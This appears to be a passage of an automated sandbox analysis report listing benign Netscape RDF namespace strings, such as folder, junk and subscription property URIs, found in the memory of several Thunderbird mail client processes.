Source: thunderbird.exe, 00000008.00000000.2341350812.0000000000B9E000.00000008.00000001.01000000.0000000D.sdmp, thunderbird.exe, 00000008.00000003.2452687011.00000000048B3000.00000004.00000001.00020000.00000000.sdmp, thunderbird.exe, 00000009.00000002.2633873253.0000000000B9E000.00000008.00000001.01000000.0000001B.sdmp, thunderbird.exe, 00000010.00000000.2824493366.0000000000B9E000.00000008.00000001.01000000.0000001B.sdmp	String found in binary or memory: http://home.netscape.com/NC-rdf#IsSessionDefaultServer
Source: thunderbird.exe, 00000008.00000000.2341350812.0000000000B9E000.00000008.00000001.01000000.0000000D.sdmp, thunderbird.exe, 00000008.00000003.2452687011.00000000048B3000.00000004.00000001.00020000.00000000.sdmp, thunderbird.exe, 00000009.00000002.2633873253.0000000000B9E000.00000008.00000001.01000000.0000001B.sdmp, thunderbird.exe, 00000010.00000000.2824493366.0000000000B9E000.00000008.00000001.01000000.0000001B.sdmp	String found in binary or memory: http://home.netscape.com/NC-rdf#IsSessionDefaultServerNC:smtpservershttp://home.netscape.com/NC-rdf#
Source: thunderbird.exe, 00000008.00000000.2341350812.0000000000B9E000.00000008.00000001.01000000.0000000D.sdmp, thunderbird.exe, 00000008.00000003.2452687011.00000000048B3000.00000004.00000001.00020000.00000000.sdmp, thunderbird.exe, 00000009.00000002.2633873253.0000000000B9E000.00000008.00000001.01000000.0000001B.sdmp, thunderbird.exe, 00000010.00000000.2824493366.0000000000B9E000.00000008.00000001.01000000.0000001B.sdmp	String found in binary or memory: http://home.netscape.com/NC-rdf#IsWriteable
Source: thunderbird.exe, 00000008.00000000.2341350812.0000000000B9E000.00000008.00000001.01000000.0000000D.sdmp, thunderbird.exe, 00000008.00000003.2452687011.00000000048B3000.00000004.00000001.00020000.00000000.sdmp, thunderbird.exe, 00000009.00000002.2633873253.0000000000B9E000.00000008.00000001.01000000.0000001B.sdmp, thunderbird.exe, 00000010.00000000.2824493366.0000000000B9E000.00000008.00000001.01000000.0000001B.sdmp	String found in binary or memory: http://home.netscape.com/NC-rdf#Junk
Source: thunderbird.exe, 00000008.00000000.2341350812.0000000000B9E000.00000008.00000001.01000000.0000000D.sdmp, thunderbird.exe, 00000008.00000003.2452687011.00000000048B3000.00000004.00000001.00020000.00000000.sdmp, thunderbird.exe, 00000009.00000002.2633873253.0000000000B9E000.00000008.00000001.01000000.0000001B.sdmp, thunderbird.exe, 00000010.00000000.2824493366.0000000000B9E000.00000008.00000001.01000000.0000001B.sdmp	String found in binary or memory: http://home.netscape.com/NC-rdf#Key
Source: thunderbird.exe, 00000008.00000003.2452687011.00000000048B3000.00000004.00000001.00020000.00000000.sdmp, thunderbird.exe, 00000008.00000002.2457636167.0000000000A3C000.00000002.00000001.01000000.0000000D.sdmp, thunderbird.exe, 00000008.00000000.2341233312.0000000000A3C000.00000002.00000001.01000000.0000000D.sdmp, thunderbird.exe, 00000009.00000002.2633767653.0000000000A3C000.00000002.00000001.01000000.0000001B.sdmp, thunderbird.exe, 00000009.00000000.2456623788.0000000000A3C000.00000002.00000001.01000000.0000001B.sdmp, thunderbird.exe, 00000010.00000000.2824396788.0000000000A3C000.00000002.00000001.01000000.0000001B.sdmp, thunderbird.exe, 00000010.00000002.2988595385.0000000000A3C000.00000002.00000001.01000000.0000001B.sdmp	String found in binary or memory: http://home.netscape.com/NC-rdf#KeyIndex
Source: thunderbird.exe, 00000008.00000000.2341350812.0000000000B9E000.00000008.00000001.01000000.0000000D.sdmp, thunderbird.exe, 00000008.00000003.2452687011.00000000048B3000.00000004.00000001.00020000.00000000.sdmp, thunderbird.exe, 00000009.00000002.2633873253.0000000000B9E000.00000008.00000001.01000000.0000001B.sdmp, thunderbird.exe, 00000010.00000000.2824493366.0000000000B9E000.00000008.00000001.01000000.0000001B.sdmp	String found in binary or memory: http://home.netscape.com/NC-rdf#LeafName
Source: thunderbird.exe, 00000008.00000000.2341350812.0000000000B9E000.00000008.00000001.01000000.0000000D.sdmp, thunderbird.exe, 00000008.00000003.2452687011.00000000048B3000.00000004.00000001.00020000.00000000.sdmp, thunderbird.exe, 00000009.00000002.2633873253.0000000000B9E000.00000008.00000001.01000000.0000001B.sdmp, thunderbird.exe, 00000010.00000000.2824493366.0000000000B9E000.00000008.00000001.01000000.0000001B.sdmp	String found in binary or memory: http://home.netscape.com/NC-rdf#MarkAllMessagesRead
Source: thunderbird.exe, 00000008.00000000.2341350812.0000000000B9E000.00000008.00000001.01000000.0000000D.sdmp, thunderbird.exe, 00000008.00000003.2452687011.00000000048B3000.00000004.00000001.00020000.00000000.sdmp, thunderbird.exe, 00000009.00000002.2633873253.0000000000B9E000.00000008.00000001.01000000.0000001B.sdmp, thunderbird.exe, 00000010.00000000.2824493366.0000000000B9E000.00000008.00000001.01000000.0000001B.sdmp	String found in binary or memory: http://home.netscape.com/NC-rdf#Modify
Source: thunderbird.exe, 00000008.00000000.2341350812.0000000000B9E000.00000008.00000001.01000000.0000000D.sdmp, thunderbird.exe, 00000008.00000003.2452687011.00000000048B3000.00000004.00000001.00020000.00000000.sdmp, thunderbird.exe, 00000009.00000002.2633873253.0000000000B9E000.00000008.00000001.01000000.0000001B.sdmp, thunderbird.exe, 00000010.00000000.2824493366.0000000000B9E000.00000008.00000001.01000000.0000001B.sdmp	String found in binary or memory: http://home.netscape.com/NC-rdf#Modify.descriptionldap_2.servers.pab.descriptionabook.mab%s%s.mabcon
Source: thunderbird.exe, 00000008.00000000.2341350812.0000000000B9E000.00000008.00000001.01000000.0000000D.sdmp, thunderbird.exe, 00000008.00000003.2452687011.00000000048B3000.00000004.00000001.00020000.00000000.sdmp, thunderbird.exe, 00000009.00000002.2633873253.0000000000B9E000.00000008.00000001.01000000.0000001B.sdmp, thunderbird.exe, 00000010.00000000.2824493366.0000000000B9E000.00000008.00000001.01000000.0000001B.sdmp	String found in binary or memory: http://home.netscape.com/NC-rdf#Move
Source: thunderbird.exe, 00000008.00000000.2341350812.0000000000B9E000.00000008.00000001.01000000.0000000D.sdmp, thunderbird.exe, 00000008.00000003.2452687011.00000000048B3000.00000004.00000001.00020000.00000000.sdmp, thunderbird.exe, 00000009.00000002.2633873253.0000000000B9E000.00000008.00000001.01000000.0000001B.sdmp, thunderbird.exe, 00000010.00000000.2824493366.0000000000B9E000.00000008.00000001.01000000.0000001B.sdmp	String found in binary or memory: http://home.netscape.com/NC-rdf#MoveFolder
Source: thunderbird.exe, 00000008.00000000.2341350812.0000000000B9E000.00000008.00000001.01000000.0000000D.sdmp, thunderbird.exe, 00000008.00000003.2452687011.00000000048B3000.00000004.00000001.00020000.00000000.sdmp, thunderbird.exe, 00000008.00000002.2457636167.0000000000A3C000.00000002.00000001.01000000.0000000D.sdmp, thunderbird.exe, 00000008.00000000.2341233312.0000000000A3C000.00000002.00000001.01000000.0000000D.sdmp, thunderbird.exe, 00000009.00000002.2633767653.0000000000A3C000.00000002.00000001.01000000.0000001B.sdmp, thunderbird.exe, 00000009.00000000.2456623788.0000000000A3C000.00000002.00000001.01000000.0000001B.sdmp, thunderbird.exe, 00000009.00000002.2633873253.0000000000B9E000.00000008.00000001.01000000.0000001B.sdmp, thunderbird.exe, 00000010.00000000.2824396788.0000000000A3C000.00000002.00000001.01000000.0000001B.sdmp, thunderbird.exe, 00000010.00000000.2824493366.0000000000B9E000.00000008.00000001.01000000.0000001B.sdmp, thunderbird.exe, 00000010.00000002.2988595385.0000000000A3C000.00000002.00000001.01000000.0000001B.sdmp	String found in binary or memory: http://home.netscape.com/NC-rdf#Name
Source: thunderbird.exe, 00000008.00000000.2341350812.0000000000B9E000.00000008.00000001.01000000.0000000D.sdmp, thunderbird.exe, 00000008.00000003.2452687011.00000000048B3000.00000004.00000001.00020000.00000000.sdmp, thunderbird.exe, 00000009.00000002.2633873253.0000000000B9E000.00000008.00000001.01000000.0000001B.sdmp, thunderbird.exe, 00000010.00000000.2824493366.0000000000B9E000.00000008.00000001.01000000.0000001B.sdmp	String found in binary or memory: http://home.netscape.com/NC-rdf#Name?sort=true
Source: thunderbird.exe, 00000008.00000003.2452687011.00000000048B3000.00000004.00000001.00020000.00000000.sdmp, thunderbird.exe, 00000008.00000002.2457636167.0000000000A3C000.00000002.00000001.01000000.0000000D.sdmp, thunderbird.exe, 00000008.00000000.2341233312.0000000000A3C000.00000002.00000001.01000000.0000000D.sdmp, thunderbird.exe, 00000009.00000002.2633767653.0000000000A3C000.00000002.00000001.01000000.0000001B.sdmp, thunderbird.exe, 00000009.00000000.2456623788.0000000000A3C000.00000002.00000001.01000000.0000001B.sdmp, thunderbird.exe, 00000010.00000000.2824396788.0000000000A3C000.00000002.00000001.01000000.0000001B.sdmp, thunderbird.exe, 00000010.00000002.2988595385.0000000000A3C000.00000002.00000001.01000000.0000001B.sdmp	String found in binary or memory: http://home.netscape.com/NC-rdf#Namehttp://home.netscape.com/NC-rdf#Checkedhttp://home.netscape.com/
Source: thunderbird.exe, 00000008.00000003.2452687011.00000000048B3000.00000004.00000001.00020000.00000000.sdmp, thunderbird.exe, 00000008.00000002.2457636167.0000000000A3C000.00000002.00000001.01000000.0000000D.sdmp, thunderbird.exe, 00000008.00000000.2341233312.0000000000A3C000.00000002.00000001.01000000.0000000D.sdmp, thunderbird.exe, 00000009.00000002.2633767653.0000000000A3C000.00000002.00000001.01000000.0000001B.sdmp, thunderbird.exe, 00000009.00000000.2456623788.0000000000A3C000.00000002.00000001.01000000.0000001B.sdmp, thunderbird.exe, 00000010.00000000.2824396788.0000000000A3C000.00000002.00000001.01000000.0000001B.sdmp, thunderbird.exe, 00000010.00000002.2988595385.0000000000A3C000.00000002.00000001.01000000.0000001B.sdmp	String found in binary or memory: http://home.netscape.com/NC-rdf#Namehttp://home.netscape.com/NC-rdf#KeyIndex
Source: thunderbird.exe, 00000008.00000000.2341350812.0000000000B9E000.00000008.00000001.01000000.0000000D.sdmp, thunderbird.exe, 00000008.00000003.2452687011.00000000048B3000.00000004.00000001.00020000.00000000.sdmp, thunderbird.exe, 00000009.00000002.2633873253.0000000000B9E000.00000008.00000001.01000000.0000001B.sdmp, thunderbird.exe, 00000010.00000000.2824493366.0000000000B9E000.00000008.00000001.01000000.0000001B.sdmp	String found in binary or memory: http://home.netscape.com/NC-rdf#NewFolder
Source: thunderbird.exe, 00000008.00000000.2341350812.0000000000B9E000.00000008.00000001.01000000.0000000D.sdmp, thunderbird.exe, 00000008.00000003.2452687011.00000000048B3000.00000004.00000001.00020000.00000000.sdmp, thunderbird.exe, 00000009.00000002.2633873253.0000000000B9E000.00000008.00000001.01000000.0000001B.sdmp, thunderbird.exe, 00000010.00000000.2824493366.0000000000B9E000.00000008.00000001.01000000.0000001B.sdmp	String found in binary or memory: http://home.netscape.com/NC-rdf#NewMessages
Source: thunderbird.exe, 00000008.00000000.2341350812.0000000000B9E000.00000008.00000001.01000000.0000000D.sdmp, thunderbird.exe, 00000008.00000003.2452687011.00000000048B3000.00000004.00000001.00020000.00000000.sdmp, thunderbird.exe, 00000009.00000002.2633873253.0000000000B9E000.00000008.00000001.01000000.0000001B.sdmp, thunderbird.exe, 00000010.00000000.2824493366.0000000000B9E000.00000008.00000001.01000000.0000001B.sdmp	String found in binary or memory: http://home.netscape.com/NC-rdf#NoSelect
Source: thunderbird.exe, 00000008.00000000.2341350812.0000000000B9E000.00000008.00000001.01000000.0000000D.sdmp, thunderbird.exe, 00000008.00000003.2452687011.00000000048B3000.00000004.00000001.00020000.00000000.sdmp, thunderbird.exe, 00000009.00000002.2633873253.0000000000B9E000.00000008.00000001.01000000.0000001B.sdmp, thunderbird.exe, 00000010.00000000.2824493366.0000000000B9E000.00000008.00000001.01000000.0000001B.sdmp	String found in binary or memory: http://home.netscape.com/NC-rdf#PageTag
Source: thunderbird.exe, 00000008.00000000.2341350812.0000000000B9E000.00000008.00000001.01000000.0000000D.sdmp, thunderbird.exe, 00000008.00000003.2452687011.00000000048B3000.00000004.00000001.00020000.00000000.sdmp, thunderbird.exe, 00000009.00000002.2633873253.0000000000B9E000.00000008.00000001.01000000.0000001B.sdmp, thunderbird.exe, 00000010.00000000.2824493366.0000000000B9E000.00000008.00000001.01000000.0000001B.sdmp	String found in binary or memory: http://home.netscape.com/NC-rdf#PageTitle
Source: thunderbird.exe, 00000008.00000000.2341350812.0000000000B9E000.00000008.00000001.01000000.0000000D.sdmp, thunderbird.exe, 00000008.00000003.2452687011.00000000048B3000.00000004.00000001.00020000.00000000.sdmp, thunderbird.exe, 00000009.00000002.2633873253.0000000000B9E000.00000008.00000001.01000000.0000001B.sdmp, thunderbird.exe, 00000010.00000000.2824493366.0000000000B9E000.00000008.00000001.01000000.0000001B.sdmp	String found in binary or memory: http://home.netscape.com/NC-rdf#PageTitleAddressing
Source: thunderbird.exe, 00000008.00000000.2341350812.0000000000B9E000.00000008.00000001.01000000.0000000D.sdmp, thunderbird.exe, 00000008.00000003.2452687011.00000000048B3000.00000004.00000001.00020000.00000000.sdmp, thunderbird.exe, 00000009.00000002.2633873253.0000000000B9E000.00000008.00000001.01000000.0000001B.sdmp, thunderbird.exe, 00000010.00000000.2824493366.0000000000B9E000.00000008.00000001.01000000.0000001B.sdmp	String found in binary or memory: http://home.netscape.com/NC-rdf#PageTitleCopies
Source: thunderbird.exe, 00000008.00000000.2341350812.0000000000B9E000.00000008.00000001.01000000.0000000D.sdmp, thunderbird.exe, 00000008.00000003.2452687011.00000000048B3000.00000004.00000001.00020000.00000000.sdmp, thunderbird.exe, 00000009.00000002.2633873253.0000000000B9E000.00000008.00000001.01000000.0000001B.sdmp, thunderbird.exe, 00000010.00000000.2824493366.0000000000B9E000.00000008.00000001.01000000.0000001B.sdmp	String found in binary or memory: http://home.netscape.com/NC-rdf#PageTitleDiskSpace
Source: thunderbird.exe, 00000008.00000000.2341350812.0000000000B9E000.00000008.00000001.01000000.0000000D.sdmp, thunderbird.exe, 00000008.00000003.2452687011.00000000048B3000.00000004.00000001.00020000.00000000.sdmp, thunderbird.exe, 00000009.00000002.2633873253.0000000000B9E000.00000008.00000001.01000000.0000001B.sdmp, thunderbird.exe, 00000010.00000000.2824493366.0000000000B9E000.00000008.00000001.01000000.0000001B.sdmp	String found in binary or memory: http://home.netscape.com/NC-rdf#PageTitleFakeAccount
Source: thunderbird.exe, 00000008.00000000.2341350812.0000000000B9E000.00000008.00000001.01000000.0000000D.sdmp, thunderbird.exe, 00000008.00000003.2452687011.00000000048B3000.00000004.00000001.00020000.00000000.sdmp, thunderbird.exe, 00000009.00000002.2633873253.0000000000B9E000.00000008.00000001.01000000.0000001B.sdmp, thunderbird.exe, 00000010.00000000.2824493366.0000000000B9E000.00000008.00000001.01000000.0000001B.sdmp	String found in binary or memory: http://home.netscape.com/NC-rdf#PageTitleJunk
Source: thunderbird.exe, 00000008.00000000.2341350812.0000000000B9E000.00000008.00000001.01000000.0000000D.sdmp, thunderbird.exe, 00000008.00000003.2452687011.00000000048B3000.00000004.00000001.00020000.00000000.sdmp, thunderbird.exe, 00000009.00000002.2633873253.0000000000B9E000.00000008.00000001.01000000.0000001B.sdmp, thunderbird.exe, 00000010.00000000.2824493366.0000000000B9E000.00000008.00000001.01000000.0000001B.sdmp	String found in binary or memory: http://home.netscape.com/NC-rdf#PageTitleMain
Source: thunderbird.exe, 00000008.00000000.2341350812.0000000000B9E000.00000008.00000001.01000000.0000000D.sdmp, thunderbird.exe, 00000008.00000003.2452687011.00000000048B3000.00000004.00000001.00020000.00000000.sdmp, thunderbird.exe, 00000009.00000002.2633873253.0000000000B9E000.00000008.00000001.01000000.0000001B.sdmp, thunderbird.exe, 00000010.00000000.2824493366.0000000000B9E000.00000008.00000001.01000000.0000001B.sdmp	String found in binary or memory: http://home.netscape.com/NC-rdf#PageTitleOfflineAndDiskSpace
Source: thunderbird.exe, 00000008.00000000.2341350812.0000000000B9E000.00000008.00000001.01000000.0000000D.sdmp, thunderbird.exe, 00000008.00000003.2452687011.00000000048B3000.00000004.00000001.00020000.00000000.sdmp, thunderbird.exe, 00000009.00000002.2633873253.0000000000B9E000.00000008.00000001.01000000.0000001B.sdmp, thunderbird.exe, 00000010.00000000.2824493366.0000000000B9E000.00000008.00000001.01000000.0000001B.sdmp	String found in binary or memory: http://home.netscape.com/NC-rdf#PageTitleSMTP
Source: thunderbird.exe, 00000008.00000000.2341350812.0000000000B9E000.00000008.00000001.01000000.0000000D.sdmp, thunderbird.exe, 00000008.00000003.2452687011.00000000048B3000.00000004.00000001.00020000.00000000.sdmp, thunderbird.exe, 00000009.00000002.2633873253.0000000000B9E000.00000008.00000001.01000000.0000001B.sdmp, thunderbird.exe, 00000010.00000000.2824493366.0000000000B9E000.00000008.00000001.01000000.0000001B.sdmp	String found in binary or memory: http://home.netscape.com/NC-rdf#PageTitleServer
Source: thunderbird.exe, 00000008.00000000.2341350812.0000000000B9E000.00000008.00000001.01000000.0000000D.sdmp, thunderbird.exe, 00000008.00000003.2452687011.00000000048B3000.00000004.00000001.00020000.00000000.sdmp, thunderbird.exe, 00000009.00000002.2633873253.0000000000B9E000.00000008.00000001.01000000.0000001B.sdmp, thunderbird.exe, 00000010.00000000.2824493366.0000000000B9E000.00000008.00000001.01000000.0000001B.sdmp	String found in binary or memory: http://home.netscape.com/NC-rdf#ProgressPercent
Source: thunderbird.exe, 00000008.00000000.2341350812.0000000000B9E000.00000008.00000001.01000000.0000000D.sdmp, thunderbird.exe, 00000008.00000003.2452687011.00000000048B3000.00000004.00000001.00020000.00000000.sdmp, thunderbird.exe, 00000009.00000002.2633873253.0000000000B9E000.00000008.00000001.01000000.0000001B.sdmp, thunderbird.exe, 00000010.00000000.2824493366.0000000000B9E000.00000008.00000001.01000000.0000001B.sdmp	String found in binary or memory: http://home.netscape.com/NC-rdf#ReallyDelete
Source: thunderbird.exe, 00000008.00000000.2341350812.0000000000B9E000.00000008.00000001.01000000.0000000D.sdmp, thunderbird.exe, 00000008.00000003.2452687011.00000000048B3000.00000004.00000001.00020000.00000000.sdmp, thunderbird.exe, 00000009.00000002.2633873253.0000000000B9E000.00000008.00000001.01000000.0000001B.sdmp, thunderbird.exe, 00000010.00000000.2824493366.0000000000B9E000.00000008.00000001.01000000.0000001B.sdmp	String found in binary or memory: http://home.netscape.com/NC-rdf#RedirectorType
Source: thunderbird.exe, 00000008.00000000.2341350812.0000000000B9E000.00000008.00000001.01000000.0000000D.sdmp, thunderbird.exe, 00000008.00000003.2452687011.00000000048B3000.00000004.00000001.00020000.00000000.sdmp, thunderbird.exe, 00000009.00000002.2633873253.0000000000B9E000.00000008.00000001.01000000.0000001B.sdmp, thunderbird.exe, 00000010.00000000.2824493366.0000000000B9E000.00000008.00000001.01000000.0000001B.sdmp	String found in binary or memory: http://home.netscape.com/NC-rdf#Rename
Source: thunderbird.exe, 00000008.00000000.2341350812.0000000000B9E000.00000008.00000001.01000000.0000000D.sdmp, thunderbird.exe, 00000008.00000003.2452687011.00000000048B3000.00000004.00000001.00020000.00000000.sdmp, thunderbird.exe, 00000009.00000002.2633873253.0000000000B9E000.00000008.00000001.01000000.0000001B.sdmp, thunderbird.exe, 00000010.00000000.2824493366.0000000000B9E000.00000008.00000001.01000000.0000001B.sdmp	String found in binary or memory: http://home.netscape.com/NC-rdf#Server
Source: thunderbird.exe, 00000008.00000000.2341350812.0000000000B9E000.00000008.00000001.01000000.0000000D.sdmp, thunderbird.exe, 00000008.00000003.2452687011.00000000048B3000.00000004.00000001.00020000.00000000.sdmp, thunderbird.exe, 00000009.00000002.2633873253.0000000000B9E000.00000008.00000001.01000000.0000001B.sdmp, thunderbird.exe, 00000010.00000000.2824493366.0000000000B9E000.00000008.00000001.01000000.0000001B.sdmp	String found in binary or memory: http://home.netscape.com/NC-rdf#ServerType
Source: thunderbird.exe, 00000008.00000000.2341350812.0000000000B9E000.00000008.00000001.01000000.0000000D.sdmp, thunderbird.exe, 00000008.00000003.2452687011.00000000048B3000.00000004.00000001.00020000.00000000.sdmp, thunderbird.exe, 00000009.00000002.2633873253.0000000000B9E000.00000008.00000001.01000000.0000001B.sdmp, thunderbird.exe, 00000010.00000000.2824493366.0000000000B9E000.00000008.00000001.01000000.0000001B.sdmp	String found in binary or memory: http://home.netscape.com/NC-rdf#Settings
Source: thunderbird.exe, 00000008.00000000.2341350812.0000000000B9E000.00000008.00000001.01000000.0000000D.sdmp, thunderbird.exe, 00000008.00000003.2452687011.00000000048B3000.00000004.00000001.00020000.00000000.sdmp, thunderbird.exe, 00000009.00000002.2633873253.0000000000B9E000.00000008.00000001.01000000.0000001B.sdmp, thunderbird.exe, 00000010.00000000.2824493366.0000000000B9E000.00000008.00000001.01000000.0000001B.sdmp	String found in binary or memory: http://home.netscape.com/NC-rdf#Settingsmsgaccounts:/http://home.netscape.com/NC-rdf#PageTitleFakeAc
Source: thunderbird.exe, 00000008.00000000.2341350812.0000000000B9E000.00000008.00000001.01000000.0000000D.sdmp, thunderbird.exe, 00000008.00000003.2452687011.00000000048B3000.00000004.00000001.00020000.00000000.sdmp, thunderbird.exe, 00000009.00000002.2633873253.0000000000B9E000.00000008.00000001.01000000.0000001B.sdmp, thunderbird.exe, 00000010.00000000.2824493366.0000000000B9E000.00000008.00000001.01000000.0000001B.sdmp	String found in binary or memory: http://home.netscape.com/NC-rdf#SpecialFolder
Source: thunderbird.exe, 00000008.00000000.2341350812.0000000000B9E000.00000008.00000001.01000000.0000000D.sdmp, thunderbird.exe, 00000008.00000003.2452687011.00000000048B3000.00000004.00000001.00020000.00000000.sdmp, thunderbird.exe, 00000009.00000002.2633873253.0000000000B9E000.00000008.00000001.01000000.0000001B.sdmp, thunderbird.exe, 00000010.00000000.2824493366.0000000000B9E000.00000008.00000001.01000000.0000001B.sdmp	String found in binary or memory: http://home.netscape.com/NC-rdf#StatusText
Source: thunderbird.exe, 00000008.00000000.2341350812.0000000000B9E000.00000008.00000001.01000000.0000000D.sdmp, thunderbird.exe, 00000008.00000003.2452687011.00000000048B3000.00000004.00000001.00020000.00000000.sdmp, thunderbird.exe, 00000009.00000002.2633873253.0000000000B9E000.00000008.00000001.01000000.0000001B.sdmp, thunderbird.exe, 00000010.00000000.2824493366.0000000000B9E000.00000008.00000001.01000000.0000001B.sdmp	String found in binary or memory: http://home.netscape.com/NC-rdf#SubfoldersHaveUnreadMessages
Source: thunderbird.exe, 00000008.00000000.2341350812.0000000000B9E000.00000008.00000001.01000000.0000000D.sdmp, thunderbird.exe, 00000008.00000003.2452687011.00000000048B3000.00000004.00000001.00020000.00000000.sdmp, thunderbird.exe, 00000009.00000002.2633873253.0000000000B9E000.00000008.00000001.01000000.0000001B.sdmp, thunderbird.exe, 00000010.00000000.2824493366.0000000000B9E000.00000008.00000001.01000000.0000001B.sdmp	String found in binary or memory: http://home.netscape.com/NC-rdf#Subscribable
Source: thunderbird.exe, 00000008.00000000.2341350812.0000000000B9E000.00000008.00000001.01000000.0000000D.sdmp, thunderbird.exe, 00000008.00000003.2452687011.00000000048B3000.00000004.00000001.00020000.00000000.sdmp, thunderbird.exe, 00000009.00000002.2633873253.0000000000B9E000.00000008.00000001.01000000.0000001B.sdmp, thunderbird.exe, 00000010.00000000.2824493366.0000000000B9E000.00000008.00000001.01000000.0000001B.sdmp	String found in binary or memory: http://home.netscape.com/NC-rdf#Subscribablehttp://home.netscape.com/NC-rdf#Subscribedhttp://home.ne
Source: thunderbird.exe, 00000008.00000000.2341350812.0000000000B9E000.00000008.00000001.01000000.0000000D.sdmp, thunderbird.exe, 00000008.00000003.2452687011.00000000048B3000.00000004.00000001.00020000.00000000.sdmp, thunderbird.exe, 00000009.00000002.2633873253.0000000000B9E000.00000008.00000001.01000000.0000001B.sdmp, thunderbird.exe, 00000010.00000000.2824493366.0000000000B9E000.00000008.00000001.01000000.0000001B.sdmp	String found in binary or memory: http://home.netscape.com/NC-rdf#Subscribed
Source: thunderbird.exe, 00000008.00000000.2341350812.0000000000B9E000.00000008.00000001.01000000.0000000D.sdmp, thunderbird.exe, 00000008.00000003.2452687011.00000000048B3000.00000004.00000001.00020000.00000000.sdmp, thunderbird.exe, 00000009.00000002.2633873253.0000000000B9E000.00000008.00000001.01000000.0000001B.sdmp, thunderbird.exe, 00000010.00000000.2824493366.0000000000B9E000.00000008.00000001.01000000.0000001B.sdmp	String found in binary or memory: http://home.netscape.com/NC-rdf#SupportsFilters
Source: thunderbird.exe, 00000008.00000000.2341350812.0000000000B9E000.00000008.00000001.01000000.0000000D.sdmp, thunderbird.exe, 00000008.00000003.2452687011.00000000048B3000.00000004.00000001.00020000.00000000.sdmp, thunderbird.exe, 00000009.00000002.2633873253.0000000000B9E000.00000008.00000001.01000000.0000001B.sdmp, thunderbird.exe, 00000010.00000000.2824493366.0000000000B9E000.00000008.00000001.01000000.0000001B.sdmp	String found in binary or memory: http://home.netscape.com/NC-rdf#SupportsOffline
Source: thunderbird.exe, 00000008.00000000.2341350812.0000000000B9E000.00000008.00000001.01000000.0000000D.sdmp, thunderbird.exe, 00000008.00000003.2452687011.00000000048B3000.00000004.00000001.00020000.00000000.sdmp, thunderbird.exe, 00000009.00000002.2633873253.0000000000B9E000.00000008.00000001.01000000.0000001B.sdmp, thunderbird.exe, 00000010.00000000.2824493366.0000000000B9E000.00000008.00000001.01000000.0000001B.sdmp	String found in binary or memory: http://home.netscape.com/NC-rdf#SyncDisabled
Source: thunderbird.exe, 00000008.00000000.2341350812.0000000000B9E000.00000008.00000001.01000000.0000000D.sdmp, thunderbird.exe, 00000008.00000003.2452687011.00000000048B3000.00000004.00000001.00020000.00000000.sdmp, thunderbird.exe, 00000009.00000002.2633873253.0000000000B9E000.00000008.00000001.01000000.0000001B.sdmp, thunderbird.exe, 00000010.00000000.2824493366.0000000000B9E000.00000008.00000001.01000000.0000001B.sdmp	String found in binary or memory: http://home.netscape.com/NC-rdf#Synchronize
Source: thunderbird.exe, 00000008.00000000.2341350812.0000000000B9E000.00000008.00000001.01000000.0000000D.sdmp, thunderbird.exe, 00000008.00000003.2452687011.00000000048B3000.00000004.00000001.00020000.00000000.sdmp, thunderbird.exe, 00000009.00000002.2633873253.0000000000B9E000.00000008.00000001.01000000.0000001B.sdmp, thunderbird.exe, 00000010.00000000.2824493366.0000000000B9E000.00000008.00000001.01000000.0000001B.sdmp	String found in binary or memory: http://home.netscape.com/NC-rdf#TotalMessages
Source: thunderbird.exe, 00000008.00000000.2341350812.0000000000B9E000.00000008.00000001.01000000.0000000D.sdmp, thunderbird.exe, 00000008.00000003.2452687011.00000000048B3000.00000004.00000001.00020000.00000000.sdmp, thunderbird.exe, 00000009.00000002.2633873253.0000000000B9E000.00000008.00000001.01000000.0000001B.sdmp, thunderbird.exe, 00000010.00000000.2824493366.0000000000B9E000.00000008.00000001.01000000.0000001B.sdmp	String found in binary or memory: http://home.netscape.com/NC-rdf#TotalUnreadMessages
Source: thunderbird.exe, 00000008.00000000.2341350812.0000000000B9E000.00000008.00000001.01000000.0000000D.sdmp, thunderbird.exe, 00000008.00000003.2452687011.00000000048B3000.00000004.00000001.00020000.00000000.sdmp, thunderbird.exe, 00000009.00000002.2633873253.0000000000B9E000.00000008.00000001.01000000.0000001B.sdmp, thunderbird.exe, 00000010.00000000.2824493366.0000000000B9E000.00000008.00000001.01000000.0000001B.sdmp	String found in binary or memory: http://home.netscape.com/NC-rdf#Transferred
Source: thunderbird.exe, 00000008.00000000.2341350812.0000000000B9E000.00000008.00000001.01000000.0000000D.sdmp, thunderbird.exe, 00000008.00000003.2452687011.00000000048B3000.00000004.00000001.00020000.00000000.sdmp, thunderbird.exe, 00000009.00000002.2633873253.0000000000B9E000.00000008.00000001.01000000.0000001B.sdmp, thunderbird.exe, 00000010.00000000.2824493366.0000000000B9E000.00000008.00000001.01000000.0000001B.sdmp	String found in binary or memory: http://home.netscape.com/NC-rdf#URL
Source: thunderbird.exe, 00000008.00000000.2341350812.0000000000B9E000.00000008.00000001.01000000.0000000D.sdmp, thunderbird.exe, 00000008.00000003.2452687011.00000000048B3000.00000004.00000001.00020000.00000000.sdmp, thunderbird.exe, 00000009.00000002.2633873253.0000000000B9E000.00000008.00000001.01000000.0000001B.sdmp, thunderbird.exe, 00000010.00000000.2824493366.0000000000B9E000.00000008.00000001.01000000.0000001B.sdmp	String found in binary or memory: http://home.netscape.com/NC-rdf#Virtual
Source: thunderbird.exe, 00000008.00000000.2341350812.0000000000B9E000.00000008.00000001.01000000.0000000D.sdmp, thunderbird.exe, 00000008.00000003.2452687011.00000000048B3000.00000004.00000001.00020000.00000000.sdmp, thunderbird.exe, 00000009.00000002.2633873253.0000000000B9E000.00000008.00000001.01000000.0000001B.sdmp, thunderbird.exe, 00000010.00000000.2824493366.0000000000B9E000.00000008.00000001.01000000.0000001B.sdmp	String found in binary or memory: http://home.netscape.com/NC-rdf#alwaysAsk
Source: thunderbird.exe, 00000008.00000000.2341350812.0000000000B9E000.00000008.00000001.01000000.0000000D.sdmp, thunderbird.exe, 00000008.00000003.2452687011.00000000048B3000.00000004.00000001.00020000.00000000.sdmp, thunderbird.exe, 00000009.00000002.2633873253.0000000000B9E000.00000008.00000001.01000000.0000001B.sdmp, thunderbird.exe, 00000010.00000000.2824493366.0000000000B9E000.00000008.00000001.01000000.0000001B.sdmp	String found in binary or memory: http://home.netscape.com/NC-rdf#attribute
Source: thunderbird.exe, 00000008.00000000.2341350812.0000000000B9E000.00000008.00000001.01000000.0000000D.sdmp, thunderbird.exe, 00000008.00000003.2452687011.00000000048B3000.00000004.00000001.00020000.00000000.sdmp, thunderbird.exe, 00000009.00000002.2633873253.0000000000B9E000.00000008.00000001.01000000.0000001B.sdmp, thunderbird.exe, 00000010.00000000.2824493366.0000000000B9E000.00000008.00000001.01000000.0000001B.sdmp	String found in binary or memory: http://home.netscape.com/NC-rdf#child
